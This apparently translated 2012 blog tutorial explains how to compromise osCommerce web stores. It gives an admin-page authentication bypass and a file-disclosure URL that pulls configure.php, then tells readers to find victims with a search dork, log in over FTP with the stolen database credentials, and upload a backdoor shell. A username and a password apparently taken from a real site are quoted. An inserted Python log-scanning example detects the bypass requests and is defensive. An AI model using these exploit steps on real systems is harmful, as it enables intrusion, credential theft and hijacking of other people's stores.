Wednesday, 29 August 2012

Tutorial Upload Shell osCommerce

# Bypass Admin Page:

You can use this trick if the admin folder is not protected by .htaccess.

If you want to explore the admin pages without logging in, you can append /login.php after the name of the file.

Example :

http://[site]/admin/backup.php/login.php

or

http://[site]/admin/file_manager.php/login.php

Demo :

http://server/store/admin/file_manager.php/login.php

You can see all the files in the osCommerce directory.. haha ;)

And you can download all the files with the trick above.


# File Disclosure :

In: admin/file_manager.php/login.php?action=download&filename=

Exploit : admin/file_manager.php/login.php?action=download&filename=/includes/configure.php

Example : http://[site]/[path]/admin/file_manager.php/login.php?action=download&filename=/includes/configure.php
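
An added example, not part of the original post: a log check for the request shape described in the two sections above, an admin script followed by a trailing /login.php, with a successful file download rated higher. The access-log format, the sample lines and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Request portion of a common/combined-format access log line (assumed format).
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]*\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# An admin script with a trailing "/login.php" segment appended to it.
# "admin" is the directory name used on the page; adjust if it was renamed.
BYPASS_RE = re.compile(r"/admin/(?P<script>[^/]+\.php)/login\.php$", re.IGNORECASE)

def classify(line):
    """Return a finding dict for a bypass-shaped request, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    # Decode percent-encoding and collapse duplicate slashes before matching.
    path = re.sub(r"/+", "/", unquote(parts.path))
    hit = BYPASS_RE.search(path)
    if not hit:
        return None
    query = parse_qs(parts.query)
    filename = query.get("filename", [None])[0]
    is_download = query.get("action", [""])[0] == "download" and filename is not None
    return {
        "ip": m.group("ip"),
        "script": hit.group("script"),
        "status": int(m.group("status")),
        # A 200 on a download request means a file was actually served.
        "severity": "high" if is_download and m.group("status") == "200" else "medium",
        "filename": filename,
    }

def scan(lines):
    return [f for f in map(classify, lines) if f]

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [29/Aug/2012:10:00:01 +0700] "GET /catalog/admin/login.php HTTP/1.1" 200 2311',
    '203.0.113.9 - - [29/Aug/2012:10:02:14 +0700] "GET /catalog/admin/file_manager.php/login.php HTTP/1.1" 200 8120',
    '203.0.113.9 - - [29/Aug/2012:10:02:40 +0700] "GET /catalog/admin/file_manager.php/login.php?action=download&filename=/includes/configure.php HTTP/1.1" 200 1764',
    '203.0.113.9 - - [29/Aug/2012:10:03:02 +0700] "GET /catalog/admin//backup.php/login.php HTTP/1.1" 302 0',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```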

OK, now we look for a target with the dork "Powered by osCommerce", without the quotation marks.

Example: http://target/catalog/
Now, first we look for its admin page, so it becomes http://target/catalog/admin/login.php, and there it is...

Now we use the exploit, so it becomes: http://target/catalog/admin/file_manager.php/login.php?action=download&filename=/includes/configure.php and we get configure.php, so we just download it right away.

Next, after downloading it, we open it with Notepad or something else, and there it is. First we try getting into the database, without going in through the admin, using what we obtained:

define('DB_SERVER_USERNAME', 'laurent');
define('DB_SERVER_PASSWORD', 'UQzlZ0vrHEiu');

Once we have something like that, let's open it over FTP; here I am using FileZilla.
Alhamdulillah, success :relieved: . Let's upload our backdoor; usually it goes in public_html, but here I uploaded it to httpdocs. After successfully uploading the backdoor, we check it.
http://target/shell.php

OK, it turns out it is installed; go ahead and carry on with the slaughter?
